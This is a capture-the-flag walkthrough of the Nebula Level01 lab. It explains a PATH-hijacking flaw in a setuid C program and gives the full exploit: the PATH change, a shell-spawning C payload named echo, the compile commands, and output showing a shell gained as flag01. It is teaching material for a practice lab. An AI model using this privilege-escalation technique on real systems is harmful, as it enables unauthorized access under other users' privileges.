
The next level, Level01, provides some C code for the user to evaluate. The code contains a vulnerability that allows arbitrary programs to be executed. This post will outline the steps I took to solve the challenge.

I started by reading through the source code in order to locate the vulnerability:

	#include <stdlib.h>
	#include <unistd.h>
	#include <string.h>
	#include <sys/types.h>
	#include <stdio.h>

	int main(int argc, char **argv, char **envp)
	{
		gid_t gid;
		uid_t uid;
		gid = getegid();
		uid = geteuid();

		/* the binary is setuid flag01: copy the effective ids into the real and
		   saved ids so anything spawned below keeps flag01's privileges */
		setresgid(gid, gid, gid);
		setresuid(uid, uid, uid);

		/* env(1) locates "echo" by searching PATH, which the caller controls */
		system("/usr/bin/env echo and now what?");
	}

Almost immediately, I noticed that “echo” is being called without an absolute path. The binary is setuid flag01, and after the setresuid()/setresgid() calls everything it spawns runs as flag01. system() hands the caller's environment through unchanged, so when /usr/bin/env looks up echo it walks the PATH we supply and runs the first executable named echo that it finds. That makes the untrusted PATH the vulnerability: a user-controlled environment variable decides which program runs with elevated privileges.

Let’s prepend /tmp to our PATH so it is searched before the real system directories:

	level01@nebula:/home/flag01$ PATH=/tmp:$PATH
	level01@nebula:/home/flag01$ export PATH
	level01@nebula:/home/flag01$ echo $PATH

Now that /tmp is in the current path, we can create our own “echo” command. I have included C code below to spawn a shell. I used this code extensively in my OSCP studies as my payload when exploiting Linux/Unix boxes.

	#include <unistd.h>

	int main() {
		char *args[2];
		args[0] = "/bin/sh";
		args[1] = NULL;
		/* replace this process with a shell; the NULL envp starts it with an
		   empty environment, and it inherits the caller's flag01 uid */
		execve(args[0], args, NULL);
	}

A nice write-up on the code can be found here if you are curious about the creation and execution.

After saving the new “echo” program as /tmp/echo.c, I compile it so the resulting binary is named echo:

	level01@nebula:/tmp$ gcc echo.c -o echo
	level01@nebula:/tmp$ ls
	echo echo.c vmware-root

Now I can run the original setuid binary; env finds our /tmp/echo first and executes it as flag01, giving us a shell as that user:

	level01@nebula:/home/flag01$ id
	uid=1002(level01) gid=1002(level01) groups=1002(level01)
	level01@nebula:/home/flag01$ ./flag01
	sh-4.2$ id
	uid=998(flag01) gid=1002(level01) groups=998(flag01),1002(level01)
	sh-4.2$ getflag
	You have successfully executed getflag on a target account
